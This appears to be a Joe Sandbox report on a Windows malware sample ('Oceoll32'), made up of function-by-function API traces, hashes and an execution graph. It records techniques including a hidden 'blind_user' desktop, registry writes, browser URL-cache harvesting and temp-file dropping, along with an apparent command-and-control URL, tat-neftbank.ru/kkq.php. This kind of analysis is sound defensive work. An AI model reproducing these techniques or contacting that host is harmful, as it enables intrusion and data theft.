                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            Function 0040431F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            Function 00403840 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            Function 00403BBE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            Function 004017AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            Function 0040109B Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            Function 0040447A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            Function 0040421F Relevance: 6.0, APIs: 4, Instructions: 49registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            Function 0040429C Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            Function 00403743 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            Function 0040185F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            Function 0040682B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2710 403840 printf 2711 403880 2710->2711 2712 403884 printf 2711->2712 2713 40386d printf 2711->2713 2713->2711 2719 4052e0 2720 4052ec strcat strcat 2719->2720 2736 40431f 2720->2736 2723 405360 2724 40537c CreateProcessA 2723->2724 2725 4053ac CloseHandle sprintf 2724->2725 2735 405469 2724->2735 2727 405413 2725->2727 2726 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2728 4054d0 2726->2728 2729 4053e5 FindWindowA 2727->2729 2730 40541d 2727->2730 2729->2730 2731 405402 Sleep 2729->2731 2732 405421 Sleep 2730->2732 2730->2735 2731->2727 2733 405434 Sleep 2732->2733 2734 40543e GetWindowTextA 2732->2734 2733->2734 2734->2735 2735->2726 2737 404341 GetCurrentThreadId GetThreadDesktop 2736->2737 2738 404364 CreateDesktopA 2736->2738 2739 40438e SetThreadDesktop 2737->2739 2740 40435f memset 2737->2740 2738->2739 2738->2740 2739->2740 2740->2723 2740->2724 2843 401581 2844 4015c8 2843->2844 2845 4015a2 rand 2844->2845 2846 4015cc 2844->2846 2845->2844 2741 403562 GetModuleFileNameA 2742 403588 2741->2742 3003 402ba3 3006 402a89 3003->3006 3004 402cd2 3005 402cad GetCurrentProcessId 3005->3006 3006->3004 3006->3005 3007 402b2a GetModuleHandleA GetProcAddress 3006->3007 3007->3006 2743 4077e4 2744 407808 2743->2744 2751 40789e 2743->2751 2745 407820 SetFocus 2744->2745 2746 40782b 2744->2746 2744->2751 2745->2746 2747 407833 SetFocus 2746->2747 2748 40783e 2746->2748 2747->2748 2749 407857 2748->2749 2750 40784c SetFocus 2748->2750 2752 40786a 2749->2752 2753 40785f SetFocus 2749->2753 2750->2749 2756 4078fe CallWindowProcA 2751->2756 2758 407910 2751->2758 2754 407872 SetFocus 2752->2754 2755 40787d 2752->2755 2753->2752 2754->2755 2755->2751 2757 407885 SetFocus 2755->2757 2756->2758 2757->2751 2847 405c09 lstrlenA GetTickCount srand 2880 40509b 2847->2880 2852 405f54 2853 405caf ExpandEnvironmentStringsA 2894 40570c 2853->2894 2856 405ceb strcat strcat 2857 40431f 4 API calls 2856->2857 2858 405d14 memset 2857->2858 2859 405d72 CreateProcessA 2858->2859 2860 405d56 2858->2860 2861 405da2 CloseHandle sprintf 2859->2861 2862 405f24 DeleteFileA TerminateProcess CloseHandle 2859->2862 2860->2859 2863 405e09 2861->2863 2862->2852 2864 405e13 2863->2864 2865 405ddb FindWindowA 2863->2865 2864->2862 2866 405e1b Sleep GetWindowTextA 2864->2866 2865->2864 2867 405df8 Sleep 2865->2867 2868 405e50 2866->2868 2867->2863 2868->2862 2933 405613 2868->2933 2870 405e6b 2870->2862 2871 405e76 CopyFileA 2870->2871 2872 403619 5 API calls 2871->2872 2873 405e9c DeleteFileA lstrlenA strncmp 2872->2873 2874 405ec6 lstrlenA 2873->2874 2875 405eef 2873->2875 2941 403743 CreateFileA 2874->2941 2877 403743 4 API calls 2875->2877 2878 405eea LocalFree 2877->2878 2878->2862 2881 4050ea 2880->2881 2882 4050b6 sprintf 2881->2882 2883 4050f8 2881->2883 2944 4041f4 2882->2944 2885 4041f4 4 API calls 2883->2885 2886 40510e 2885->2886 2947 4041c3 lstrlenA 2886->2947 2889 40429c RegOpenKeyExA 2890 4042e0 RegQueryValueExA 2889->2890 2893 4042dc 2889->2893 2891 404304 RegCloseKey 2890->2891 2892 4042f8 RegCloseKey 2890->2892 2891->2893 2892->2893 2893->2852 2893->2853 2895 4079e4 2894->2895 2896 405719 GetTempPathA 2895->2896 2897 405746 2896->2897 2955 4015ea 2897->2955 2900 405798 strcat 2901 4057ac rand 2900->2901 2902 4057e7 rand 2901->2902 2903 4057be rand sprintf 2901->2903 2904 4057f9 strcat 2902->2904 2905 40580d strcat rand 2902->2905 2903->2902 2904->2905 2906 405839 strcat 2905->2906 2907 40584d rand 2905->2907 2906->2907 2908 405888 sprintf rand 2907->2908 2909 40585f rand sprintf 2907->2909 2910 4058c3 strcat 2908->2910 2911 4058d7 strcat rand 2908->2911 2909->2908 2910->2911 2912 405911 strcat rand 2911->2912 2913 4058fd strcat 2911->2913 2914 405966 strcat rand 2912->2914 2915 40593d rand sprintf 2912->2915 2913->2912 2916 4059a0 strcat rand 2914->2916 2917 40598c strcat 2914->2917 2915->2914 2918 4059d2 strcat 2916->2918 2919 4059e6 strcat rand 2916->2919 2917->2916 2918->2919 2920 405a20 sprintf rand 2919->2920 2921 405a0c strcat 2919->2921 2922 405a70 strcat rand 2920->2922 2923 405a5c strcat 2920->2923 2921->2920 2924 405ab0 rand sprintf rand 2922->2924 2925 405a9c strcat 2922->2925 2923->2922 2926 405af3 strcat 2924->2926 2927 405b07 strcat rand 2924->2927 2925->2924 2926->2927 2928 405b39 strcat 2927->2928 2929 405b4d rand 2927->2929 2928->2929 2930 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2929->2930 2931 405b5f rand sprintf 2929->2931 2932 405c04 2930->2932 2931->2930 2932->2852 2932->2856 2934 4079e4 2933->2934 2935 405620 FindFirstUrlCacheEntryA 2934->2935 2936 405663 _stricmp 2935->2936 2939 405685 2935->2939 2937 4056a7 FindNextUrlCacheEntryA 2936->2937 2936->2939 2938 4056c9 _stricmp 2937->2938 2937->2939 2938->2939 2940 4056fb 2938->2940 2939->2870 2940->2937 2942 403775 2941->2942 2943 403779 SetFilePointer WriteFile CloseHandle 2941->2943 2942->2878 2943->2942 2950 40421f RegCreateKeyExA 2944->2950 2948 40421f 4 API calls 2947->2948 2949 4041ee InterlockedIncrement memset 2948->2949 2949->2889 2951 404262 RegSetValueExA 2950->2951 2952 404219 2950->2952 2953 404288 RegCloseKey 2951->2953 2954 40427c RegCloseKey 2951->2954 2952->2881 2953->2952 2954->2952 2956 401634 2955->2956 2957 401638 strcat sprintf rand 2956->2957 2958 40160e rand 2956->2958 2957->2900 2957->2901 2958->2956 3008 4037aa 3009 4037c8 printf printf 3008->3009 3011 40380d 3009->3011 3012 4037fa printf 3011->3012 3014 403812 printf 3011->3014 3012->3011 3015 4035ab 3016 4079e4 3015->3016 3017 4035b8 vsprintf 3016->3017 3020 4035f9 MessageBoxA 3017->3020 3019 4035ea 3020->3019 2759 40686c lstrlenA 2760 405f5b 9 API calls 2759->2760 2761 40689a 2760->2761 2762 4068a1 WinExec 2761->2762 2763 4068a9 2761->2763 2762->2763 2959 40328f 2960 402efd 2959->2960 2961 402cd7 3 API calls 2960->2961 2962 4033ce 2960->2962 2963 4030e5 GetModuleHandleA 2960->2963 2964 40289a 4 API calls 2960->2964 2965 40314c VirtualQuery 2960->2965 2967 402f98 GlobalMemoryStatus 2960->2967 2968 402f6f IsBadReadPtr 2960->2968 2969 403059 CloseHandle 2960->2969 2961->2960 2963->2960 2964->2960 2965->2960 2966 4031b1 IsBadWritePtr 2965->2966 2966->2960 2967->2960 2968->2960 2969->2960 2970 407892 2971 40789e 2970->2971 2972 407910 2971->2972 2973 4078fe CallWindowProcA 2971->2973 2973->2972 3021 405133 10 API calls 3022 40429c 4 API calls 3021->3022 3023 405264 3022->3023 3024 405278 3023->3024 3025 40526b LocalFree 3023->3025 3027 40509b 6 API calls 3024->3027 3026 4054d0 3025->3026 3028 40527d ExpandEnvironmentStringsA 3027->3028 3047 404532 3028->3047 3031 4052d3 LocalFree 3031->3026 3032 4052ec strcat strcat 3033 40431f 4 API calls 3032->3033 3034 405315 memset 3033->3034 3035 405360 3034->3035 3036 40537c CreateProcessA 3034->3036 3035->3036 3037 4053ac CloseHandle sprintf 3036->3037 3046 405469 3036->3046 3039 405413 3037->3039 3038 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3038->3026 3040 4053e5 FindWindowA 3039->3040 3041 40541d 3039->3041 3040->3041 3042 405402 Sleep 3040->3042 3043 405421 Sleep 3041->3043 3041->3046 3042->3039 3044 405434 Sleep 3043->3044 3045 40543e GetWindowTextA 3043->3045 3044->3045 3045->3046 3046->3038 3048 40453f 3047->3048 3049 403619 5 API calls 